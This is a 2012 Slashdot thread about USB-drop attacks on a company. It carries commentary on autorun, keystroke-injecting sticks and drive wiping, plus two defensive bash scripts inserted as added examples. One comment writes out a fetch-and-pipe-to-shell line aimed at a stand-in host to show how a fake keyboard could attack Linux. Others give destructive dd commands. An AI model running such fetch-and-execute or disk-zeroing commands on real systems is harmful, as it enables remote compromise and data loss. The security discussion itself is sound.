Criminals Distribute Infected USB Sticks In Parking Lot 298

Posted by Unknown Lamer
from the our-dear-friend-social-engineering dept.
New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."
  • by Kenja (541830) on Monday July 09, 2012 @08:33PM (#40598133)
    So you can load USB sticks you find and extract the pictures!
    • by Anonymous Coward on Monday July 09, 2012 @08:37PM (#40598153)

      No, that's what operating systems that don't automatically run any executable that happens to appear are for.

      Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

      • by Anaerin (905998) on Monday July 09, 2012 @09:16PM (#40598397)
        Just because it looks like a memory stick, doesn't mean it actually is one. Put a microcontroller in there with a USBHID type program and you've got a keylogger, or some other remote access system just waiting to be triggered.
        • Even better is if it is a Firewire device -- from what I've read, Firewire gives all kinds of direct memory access to stuff plugged into it (it is a system level bus). Even more so for PC-card (pcmcia) devices.

        • by Anonymous Coward on Monday July 09, 2012 @11:13PM (#40598993)

          We had a couple turn out in our parking lot that when plugged in showed up as a hub that was connected to a usb drive, cd drive and a keyboard. The last one was tricky. After being plugged in, it would install the devices one by one and try to run them, if that didn't work, it registered as a keyboard and tried to put the input of windows key+r then iexplore websiteURL. That last one took me by surprise, as I'd never seen it before.

        • Can a keylogger work if it's mounted read only? How would it get the data?
          • by Anaerin (905998)
            How, precisely, do you mount a keyboard as read-only? Because that's what the micro-controller I'm proposing will look like to the system. It'd appear as a memory stick and a keyboard or a mouse or some other kind of interface device.
          • by sqlrob (173498)

            He's not saying the software on the stick is a keylogger. He's saying the stick itself is a keylogger. Just because it looks like a flash drive doesn't mean it is one.

      • by JDG1980 (2438906) on Monday July 09, 2012 @11:45PM (#40599121)

        Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

        Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

        As a result, Microsoft removed Autorun from USB drives [computerworld.com] as part of a Windows XP update in 2011. (Probably a bit late, but still, they did fix it.) On Windows 7, Autorun for USB drives was never included. The user would have to run the malware manually (and if it wants admin permissions, you'd also have to click through the UAC warning).

        • by Barbarian (9467)

          Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

          Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

          Autorun comes from Windows 95. Worth noting that cd writers were pretty cheap in 1998.

      • I think an executable would be fine. I think executables would be what lets Linux take off in the market more.

        The key is: Do not let an executable change data in any directory other than where it is installed. This way it can't change the system boot sector! It can't even change your sims baby cats edition.

        You could turn Windows into a solid security machine if you just did that. People would start downloading junk they find off the internet and liking it.
    • by gman003 (1693318)

      Why bother with virtuals?

      I have a "shitbox" I would use for this. The intent is that it is disposable - both hardware and data. In my case, it's an old, beige Athlon 900 desktop with a fading Windows ME sticker still on it. I've slapped all my old hard drives and OpenBSD on it.

      I use it mainly for trying out server shit. Learned how to set up Samba and Apache on it. Tried out several other things, as well.

      The only data on it are some SNES ROMs, tertiary backups of non-secret data (source code for various per

  • by the_humeister (922869) on Monday July 09, 2012 @08:36PM (#40598147)

    Or turn off auto-run in Windows. I once found a USB drive on the ground. Turns out it was some grad student's drive. I tried to return it but got no response from the email I found on his resume.

  • by awollabe (464677) on Monday July 09, 2012 @08:40PM (#40598181)

    and laugh at the windows auto-loader files they tried to get you with.

    Seriously, I found a "trick" USB stick in my work mailbox once, which turned out to be a test from our IT department that, if you loaded it (in Windows), would direct you to an obligatory computer security training program. After I called them about it, they let me keep it.

    • by mlts (1038732) * on Monday July 09, 2012 @09:15PM (#40598391)

      USB sticks can present themselves to the computer as more than just removable hard disks. I've seen some that will act as keyboards and when plugged into Windows, will automatically try to type things in.

      If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

      • by bill_mcgonigle (4333) * on Monday July 09, 2012 @09:52PM (#40598603) Homepage Journal

        If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

        I forget the exact mode of attack, but some will nudge the mouse a pixel or two every minute or so to prevent the screensaver from kicking on, and then after some period of user inactivity will begin doing the nefarious bits. I suppose it's easy to kick off a cmd shell from that point and script the attack.

        I'd imagine the non-mouse/keyboard part of the "drive" is baited with good porn or addictive games to encourage its continued presence. Anyway, you can scan it all you want, the drive is clean.

  • by toygeek (473120) on Monday July 09, 2012 @08:41PM (#40598199) Homepage Journal

    dd if=/dev/zero of=/dev/[usbdrive]

    voila, free thumb drive, malware free.

    • by mug funky (910186)

      that will likely bugger the drive up completely. some flash drives get written past the end or some crap like that.

      long story short, i tried this on a thumb drive that reported 8 gigs and was actually 4 gigs... after running dd it was completely useless and unrecoverable, at least by someone of my level of proficiency. YMMV

      • by mark-t (151149) <markt@lynx . b c.ca> on Monday July 09, 2012 @09:07PM (#40598349) Journal
        After executing 'dd', you still need to run mkfs on the device that holds the filesystem, or else all you have is a blanked drive. Don't forget to use "-t vfat" as an option to mkfs, or else you won't be able to use it anywhere but in Linux.
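A guarded version of the dd-then-mkfs recipe from this thread, added here as an example (not any poster's script): before zeroing, it checks in sysfs that the target is a whole disk, flagged removable, and attached over USB, so a typo cannot wipe an internal drive. SYSFS_BLOCK and DRY_RUN are assumed helper variables so the guard can be exercised against a constructed tree without root.

```bash
#!/bin/bash
# Added example, not from the thread. SYSFS_BLOCK is a hypothetical override of
# /sys/block so the checks can run against a constructed directory in tests.
SYSFS_BLOCK="${SYSFS_BLOCK:-/sys/block}"

# Return 0 only if NAME (e.g. sdb) is a removable, USB-attached whole disk.
# Partitions such as sdb1 have no /sys/block entry of their own, so they fail.
is_removable_usb_disk() {
    local dir="$SYSFS_BLOCK/$1" flag
    [ -d "$dir" ] || return 1
    read -r flag < "$dir/removable" 2>/dev/null || return 1
    [ "$flag" = 1 ] || return 1
    # The resolved device path of USB storage passes through a usbN root hub.
    case "$(readlink -f "$dir/device" 2>/dev/null)" in
        */usb[0-9]*) return 0 ;;
        *) return 1 ;;
    esac
}

# Zero the whole device, then lay down FAT32 so the stick works on any OS
# (the "-t vfat" point above). Needs root; refuses unless the guard passes.
# With DRY_RUN=1 it only prints the two commands it would run.
# Note: this touches the flash contents only; a stick whose controller
# firmware emulates a keyboard or hides a second device is unaffected.
reimage_stick() {
    local name="$1"
    if ! is_removable_usb_disk "$name"; then
        echo "refusing: /dev/$name is not a removable USB disk" >&2
        return 1
    fi
    if [ "${DRY_RUN:-0}" = 1 ]; then
        echo "dd if=/dev/zero of=/dev/$name bs=4M"
        echo "mkfs.vfat -F 32 /dev/$name"
        return 0
    fi
    dd if=/dev/zero of="/dev/$name" bs=4M || true   # dd exits 1 when the device is full
    sync
    mkfs.vfat -F 32 "/dev/$name"
}

if [ -n "${1:-}" ]; then reimage_stick "$1"; fi
```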
    • Heh heh... For Linux I do this routinely to get rid of the manufacturer's crapware, but every time I mount it on my GF's WinXP box it actually has to pause so it can download and reinstall it. WTF?

      • by v1 (525388)

        the really annoying ones are the drives that present TWO storage devices. One usually contains drivers, or a small partition with the security software to properly mount the second protected device.

        Those are usually NOT separate partitions, they're separate DEVICES and thus a dump from DD doesn't get them both. The other one is usually permanently write-protected also, tho there can be ways to get around that sometimes if you know how.

    • by hawguy (1600213) on Monday July 09, 2012 @08:51PM (#40598269)

      dd if=/dev/zero of=/dev/[usbdrive]

      voila, free thumb drive, malware free.

      Not if the drive has firmware that detects if it's plugged into a Windows host. For non-windows, it acts as a normal flash drive, but if you plug it into Windows, then it exposes the virus. So you take it home, load it up with MP3's from your linux computer and everything is fine, but then when you give it to your wife and she sees a file named "naked_secretary.exe", she runs it and gets infected.

      • by k(wi)r(kipedia) (2648849) on Monday July 09, 2012 @09:09PM (#40598363)

        Not if the drive has firmware that detects if it's plugged into a Windows host.

        Interesting. But can Linux detect the presence of the firmware, which presumably has to send some sort of message down the USB bus? My closest experience to this is with a combo USB 3G modem and flash drive.

        To handle such devices under Linux, there's a program called USB modeswitch. From the package description:

        Mode switching tool for controlling "flip flop" USB devices

        Several new USB devices have their proprietary Windows drivers onboard, especially WAN dongles. When plugged in for the first time, they act like a flash storage and start installing the driver from there. If the driver is already installed, the storage device vanishes and a new device, such as an USB modem, shows up. This is called the "ZeroCD" feature.

        On Debian, this is not needed, since the driver is included as a Linux kernel module, such as "usbserial". However, the device still shows up as "usb-storage" by default. usb-modeswitch solves that issue by sending the command which actually performs the switching of the device from "usb-storage" to "usbserial".

    • by fermion (181285) on Monday July 09, 2012 @10:47PM (#40598847) Homepage Journal
      As long as your computer does not autoexecute the USB drive, there is no problem. Of course, on many machines the USB does execute automatically, and it seems if the IT department lets that behavior stand, the responsibility cannot be with the user, but with the IT people.
    • by Chuck Chunder (21021) on Monday July 09, 2012 @11:33PM (#40599075) Homepage Journal
      The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:

      wget -q -O - http://naughty.com/ [naughty.com] | sh

      All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worthwhile for a vague target but Linux does not magically make USB sticks safe.
  • by Darth_brooks (180756) <clipper377.gmail@com> on Monday July 09, 2012 @08:55PM (#40598301) Homepage

    This technique is discussed in "Metasploit - The penetration testers guide" ( http://shop.oreilly.com/product/9781593272883.do [oreilly.com] )

    Excellent book by the way. After reading it, you'll never look at computer security the same way again, and may very well just switch to an Abacus with a box of crayons on top.

  • How many times did this work and we DON'T hear about it, in cases where people did NOT take it to their IT department?

    • by bloodhawk (813939)
      probably thousands of times, this is a very very old form of attack that has been commonly documented and used dating all the way back to the floppy disk. Most IT departments have policies specifically around found disks and media for this exact reason. Why one such failed attempt warrants a front page article is the real mystery here.
  • So next time, don't expect to find someone's dirty pictures on a USB stick you just found...

    Actually, that's exactly what industrial spies should put on there if they were smart.

  • Old trick. (Score:5, Insightful)

    by Caerdwyn (829058) on Monday July 09, 2012 @09:27PM (#40598461) Journal

    This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.

    A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.

    • by Zadaz (950521)

      Older than that. Well before USB thumb drives I was contracting at [Large Government Contractor You've Heard Of]. One day someone was outside on the street giving away CDs with free software on them. They were nice and pro, color cardboard sleeves shrink-wrapped. On the CDs were a bunch of shareware and just as many viruses.

      I didn't really mind. For three full days I got paid to sit around and wait for the admins to fumigate the network.

      The exact same thing happened less than a year later.

  • Idiots. Both of them.

  • Personal Story (Score:5, Interesting)

    by schklerg (1130369) on Monday July 09, 2012 @09:46PM (#40598579)
    So a coworker found a usb key in the parking lot and wisely didn't plug it in. Instead he asked me to check it out before he did. So dutifully I fired up my live CD, plugged it in and quickly saw it belonged to a coworker. But which one in a company of 300+? Well, that was actually pretty easy to figure out, since there was a nice folder with pictures of himself naked in a mirror. Many of them. All alone. So I gave the guy the USB key, told him what I'd seen, washed my hands (and disinfected my cubicle) and was sooooo glad when the photographer took a different job.
    So there may be a virus, or maybe just a lonely coworker.
  • Contest (Score:5, Interesting)

    by chrismcb (983081) on Monday July 09, 2012 @10:06PM (#40598677) Homepage
    Wouldn't it be more productive to give them away? As in brand them with the name of a product, and literally give them away at a place where the employees visit. I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.
    • by Jeremi (14640)

      Wouldn't it be more productive to give them away? [...] I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.

      I think you're right... but the downside would be that it would be much easier for the victims to track the infection back to its source that way.

  • Any security-minded organization would indoctrinate their employees, and set policy (either via OS security and/or SOP) to use only secured USB keys, which are provided. This should be a no-brainer, and shouldn't cost a significant amount.

    This kind of policy limits the scope of these kinds of attacks, as well as helping to prevent inadvertent info-leaks like when workers lose their wallet/backpack. By preventing stupidity and bad luck you greatly improve the company security.

  • Social Engineering at its finest and simplest. Much more effective getting your payload onto a system using this method than, say, using a dancing baby gif.

  • by humanrev (2606607) on Monday July 09, 2012 @11:44PM (#40599117)

    The autorun feature of Windows (mainly XP and to a much lesser extent Vista/7) is a textbook example of where trading convenience for security can turn out to be a VERY BAD IDEA.

    Autorun functionality pisses me off anyway. I always turn that shit off mainly because yes, if I put in a DVD or a USB flash it's likely I'm going to be wanting to use it soon, but since Autorun is going to invariably pop up some Explorer window or DVD application all of a sudden once the media has been analysed, that very action of a new window popping up without my direct instantiation of it is damn annoying.

    Saving the couple of clicks to perform the same effect of whatever Autorun does is really, really not worth the mess we've gotten ourselves into (and still do).

    • by humanrev (2606607)

      Fuck, that should have read "trading security for convenience". As in, you give up security in exchange for obtaining convenience.

      Oh now my whole comment is ruined. I can't bear to read the responses from strangers I'll never meet in the flesh, it will be too much to bear!

  • I found a RAM stick once in a parking lot, I plugged it in and found nothing, or so I thought, a directory listing was empty and an anti-virus scan returned a clean bill of health. A few days later my friend told me that he was receiving emails from me. After investigation it was determined that a Linux on windows was running, with a SMTP server and a mail client was sending many emails. Is that possible? I asked about the reason for the SMTP server, I was told it was in case my ISP was blocking or throttlin
  • by Tom (822) on Tuesday July 10, 2012 @03:28AM (#40599949) Homepage Journal

    This is so old and has happened so many times before that some organisations have had time to develop, test and deploy so-called "data gateways" - machines that you can put your USB sticks, DVDs and other media into, that will scan them for infection and safely transfer the files you select to your network share.

  • by ewanm89 (1052822) on Tuesday July 10, 2012 @08:30AM (#40601003) Homepage

    1) Penetration testers have been using this attack for some time, surprisingly often it works, it only takes one clueless manager to plug it in.

    2) With a little creative reengineering one does not need to rely on the system to automount and autorun the stick, instead one sticks a USB hub in there and a HID emulator and pumps out keystrokes, pretty much all operating systems will automatically initialize it as a keyboard device. Also one can hide that function until go time. let them act as ordinary memory sticks 'till then.
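The hub+drive+keyboard stick Anonymous Coward describes, and the HID emulator mlts, Chuck Chunder and ewanm89 mention, leave a trace Linux can check: the interface classes each USB device advertises, which the kernel exposes in sysfs. The bash script below is an added example, not any poster's code; it takes the sysfs root as a parameter (a constructed tree works for testing; on a real host use /sys/bus/usb/devices) and flags devices that present a HID interface together with storage or a hub.

```bash
#!/bin/bash
# Added example, not from the thread. Interface class 03 is HID (keyboard,
# mouse), 08 is mass storage, 09 is a hub. A single device, or a hub and its
# children, mixing 03 with 08 or 09 matches the stick described above.
# Legitimate docks match too, so treat a hit as a review trigger, not proof.

# Print the sorted, unique interface classes found anywhere under one device
# directory (interfaces are subdirectories; hub children are nested deeper).
usb_iface_classes() {
    find "$1/" -name bInterfaceClass -exec cat {} + 2>/dev/null | sort -u | tr '\n' ' '
}

# Echo "suspicious" if the device mixes HID with storage or a hub, else "ok".
classify_usb_device() {
    local classes hid=0 storage_or_hub=0 c
    classes=$(usb_iface_classes "$1")
    for c in $classes; do
        case "$c" in
            03) hid=1 ;;
            08|09) storage_or_hub=1 ;;
        esac
    done
    if [ "$hid" -eq 1 ] && [ "$storage_or_hub" -eq 1 ]; then
        echo suspicious
    else
        echo ok
    fi
}

# Walk the tree root. Entries containing ':' are interface links (already
# counted through their parent device) and usbN entries are root hubs whose
# subtree is the whole bus, so both are skipped. Prints one line per
# suspicious device and returns 1 if any were found, 0 otherwise.
scan_usb_tree() {
    local root="$1" entry name found=0
    for entry in "$root"/*/; do
        name=$(basename "$entry")
        case "$name" in *:*|usb*) continue ;; esac
        if [ "$(classify_usb_device "$entry")" = suspicious ]; then
            printf 'SUSPICIOUS %s classes: %s\n' "$name" "$(usb_iface_classes "$entry")"
            found=1
        fi
    done
    return $found
}

if [ -n "${1:-}" ]; then scan_usb_tree "$1"; fi
```

Run it from a udev hook or a cron job and alert on a non-zero exit; a plain flash drive shows only class 08 and stays quiet.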

  • by Rambo Tribble (1273454) on Tuesday July 10, 2012 @09:57AM (#40601547)

    1. Don't, under any circumstances, mount it

    2. Format it

    3. Enjoy your new USB stick
